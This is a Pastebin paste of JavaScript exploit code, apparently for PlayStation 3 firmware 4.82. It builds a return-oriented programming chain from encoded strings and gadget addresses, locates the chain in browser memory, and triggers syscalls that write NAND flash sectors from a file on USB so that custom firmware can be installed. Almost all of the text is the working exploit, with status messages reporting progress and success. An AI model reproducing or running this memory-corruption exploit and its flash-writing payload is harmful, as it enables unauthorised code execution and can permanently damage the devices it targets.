Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function initROP()
- {
- try
- {
- disable_cb();
- disable_btn();
- if(t_out!=0){clearTimeout(t_out);t_out=0;}
- var sc_sso=0x258;
- var sc_ssc=0x259;
- var sc_ssw=0x25B;
- var ros0_start_sector=0x401;
- var ros1_start_sector=0x3C01;
- var sec_step=0x800;
- var sec_endstep=0x2;
- var flash_id=0x22;
- var flash_flag=0x01000000;
- var flash2_flag=0x00000001; //NAND
- var search_max_threshold = 70*0x100000;
- var temp_addr= 0x8A000000;
- var search_base = 0x80100000;
- var search_size = 0x200000;
- var rosdump_addr=0x8C000000;
- var ros0flash_addr=0x8C000000;
- var ros0flash_addr2=0x8C100000;
- var ros0flash_addr3=0x8C200000;
- var ros0flash_addr4=0x8C300000;
- var ros1flash_addr=0x8C000010;
- var ros1flash_addr2=0x8C100010;
- var ros1flash_addr3=0x8C200010;
- var ros1flash_addr4=0x8C300010;
- var fread_mode="rb";
- usb_fp_addr=0;
- stack_frame_addr=0;
- jump_2_addr=0;
- jump_1_addr=0;
- total_loops++;
- clearLogEntry();
- var fp_root;
- var f_off_start=0x0;
- if(used_port===1){fp_root=convertString("xxxx/dev_usb001/");}
- else if(used_port===6){fp_root=convertString("xxxx/dev_usb006/");}
- else if(used_port===1000){fp_root=convertString("xxxxxxxx/dev_sd/");f_off_start=0x4;}
- else if(used_port===1001){fp_root=convertString("xxxxxxxx/dev_cf/");f_off_start=0x4;}
- else if(used_port===1002){fp_root=convertString("xxxxxxxx/dev_ms/");f_off_start=0x4;}
- else {used_port=0;fp_root=convertString("xxxx/dev_usb000/");}
- usb_fp=fp_root+convertString("flash_482.hex")+unescape("\u0000")+convertString(fread_mode)+unescape("\u0000\u0000\u4141\u4141\u4141\u4141")
- +hexw2bin(gadget3_addr)+hexw2bin(toc_addr)+unescape("\u0000\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141")+hexw2bin(gadget7_addr)+hexw2bin(toc_addr)+unescape("\uFD7E");
- function reload()
- {
- showResult(hr+"<h1><b>Exploit Initialization..."+br+"<font color=%22000000%22>Progress: "+((100/max_loops)*total_loops).toString()+"%, please wait...</font></b></h1>");
- t_out=setTimeout(initROP,1000);
- };
- function fail()
- {
- total_loops=0;
- showResult(hr+"<h1><b>Exploit Initialization FAILED!</h1><h2><font color=%22000000%22><a href=\"javascript:window.location.reload()\">Refresh this page</a> & try again...</font></b></h2>");
- cleanGUI();
- usb(used_port);
- };
- do
- {
- if(search_max_threshold<search_size){
- if(total_loops<max_loops)reload();
- else fail();
- return;}
- usb_fp=usb_fp.replaceAt(0,hexh2bin(0x7EFD));
- usb_fp_addr=findJsVariableOffset("usb_fp",usb_fp,search_base,search_size);
- search_max_threshold-=search_size;
- }while(usb_fp_addr===0);
- var rb_addr=usb_fp_addr+0x1C;
- var readlen_io=usb_fp_addr+0x22;
- var sc_addr=usb_fp_addr+0x2A;
- var readlen_addr=usb_fp_addr+0x34;
- var dev_handle_addr=usb_fp_addr+0x3C;
- var fopen_addr=usb_fp_addr+0x44;
- var usb_addr=usb_fp_addr+f_off_start;
- stack_frame= unescape("\u0102\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+unescape("\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u0000\u0000")+hexw2bin(toc_addr)+unescape("\u5152\u5354\u5556\u5758\u5960\u6162\u6364")
- +unescape("\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr)+unescape("\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192")
- +unescape("\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556")
- +unescape("\u5758\u5960\u6162")+hexw2bin(sc_sso)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(sc_addr)+unescape("\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\uFF29\uFF29\uFF29")
- +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x20)+unescape("\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u0000\u0000")+hexw2bin(gadget5_addr+0x4)+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384")
- +unescape("\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u8586\u8788")
- +unescape("\u8990\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566")+hexw2bin(flash_flag)+hexw2bin(flash2_flag)+unescape("\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112")
- +unescape("\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576")
- +unescape("\u7778\u7980\u8182\uFF11\uFF11\uFF10\uFF10\u8033\u84F0\u8033\u853E\u0010\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(fopen_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29")
- +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget4_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304")
- +unescape("\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768")
- +unescape("\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x40)+unescape("\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u0000\u0000\u0505\u0505\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132")
- +unescape("\u3334\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596")
- +unescape("\u9798\u9900\u0102\u0304\u0506\u0000\u0259\u1112\u1314\u0000\u0000\u0030\u6000\u0000\u0000")+hexw2bin(readlen_io)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324")
- +unescape("\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u7576\u7778\u7980\u8182\uFFFF\uFFFF\uFFFF")
- +unescape("\uFFFF\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u4344\u4546\u4748\u4950\u0000\u0000")+hexw2bin(temp_addr+0x60)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000\u0047\u5134\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x80)+unescape("\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
- +unescape("\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x200)+hexw2bin(ros0flash_addr)
- +hexw2bin(sec_step)+hexw2bin(ros0_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50000)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x300)+hexw2bin(ros0flash_addr2)
- +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50100)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x400)+hexw2bin(ros0flash_addr3)
- +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50200)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x500)+hexw2bin(ros0flash_addr4)
- +hexw2bin(sec_endstep)+hexw2bin(ros0_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50300)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x600)+hexw2bin(ros1flash_addr)
- +hexw2bin(sec_step)+hexw2bin(ros1_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50400)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x700)+hexw2bin(ros1flash_addr2)
- +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50500)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x800)+hexw2bin(ros1flash_addr3)
- +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50600)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x900)+hexw2bin(ros1flash_addr4)
- +hexw2bin(sec_endstep)+hexw2bin(ros1_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
- +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50700)
- +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
- +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssc)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07")
- +unescape("\uFF06\uFF06\uFF05\uFF05\uFF04\uFF04\uFF03\uFF03\uFF09\uFF09\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
- +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374")
- +unescape("\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
- +unescape("\u0000\u0000")+hexw2bin(temp_addr+0xA00)+unescape("\u0000\u0000")+hexw2bin(sp_exit)+unescape("\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget8_addr)+unescape("\u2F2A");
- do
- {
- if(search_max_threshold<search_size){
- if(total_loops<max_loops)reload();
- else fail();
- return;}
- stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
- stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base,search_size);
- search_max_threshold-=search_size;
- }while(stack_frame_addr===0);
- jump_2=unescape("\u0102\u7EFB\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950")
- +hexw2bin(stack_frame_addr)+unescape("\uFB7E");
- do
- {
- if(search_max_threshold<search_size){
- if(total_loops<max_loops)reload();
- else fail();
- return;}
- jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
- jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
- search_max_threshold-=search_size;
- }while(jump_2_addr===0);
- jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
- do
- {
- if(search_max_threshold<search_size){
- if(total_loops<max_loops)reload();
- else fail();
- return;}
- jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
- jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
- search_max_threshold-=search_size;
- }while(jump_1_addr===0);
- var u=checkMemory(usb_fp_addr-0x4,0x100,usb_fp.length);
- var j2=checkMemory(jump_2_addr-0x4,0x100,jump_2.length);
- var j1=checkMemory(jump_1_addr-0x4,0x100,jump_1.length);
- if((j2===jump_2)&&(j1===jump_1)&&(u===usb_fp))
- {
- if(t_out!=0){clearTimeout(t_out);}
- showResult(hr+"<h1><b><font color=%22386E38%22>Exploit Initialization SUCCESS...!</font></b></h1><h3><b><font color=%22000000%22>You can now proceed to patch the NAND Flash Memory!</font></b></h3>");
- enable_trigger();
- }
- else
- {
- logAdd("String mismatch in memory!");
- if(total_loops<max_loops)reload();
- else fail();
- }
- }
- catch(e)
- {
- debug=true;
- logAdd(br+"Exploit initialization failed because the following exception was thrown during execution:"+br+e);
- debug=false;
- }
- }
- function triggerX()
- {
- clearLogEntry();
- showResult(hr+"<h1><b>Proceeding to patch NAND Flash Memory...</b></h1><h3><b><font color=%22000000%22>Please wait, the patch operation takes a few minutes!</font></b></h3>");
- disable_cb();
- disable_btn();
- setTimeout(trigger,1000,jump_1_addr);
- setTimeout(success,2000,hr+"<h1><b><font color=%22386E38%22>NAND Flash memory patch operation completed..!</font></b></h1><h3><b><font color=%22000000%22>You can dump the NAND now & check that the patch has been applied successfully."+br+"Then reboot to enable the patches & install the 4.82 CFW of your choice...</font></b></h3>");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement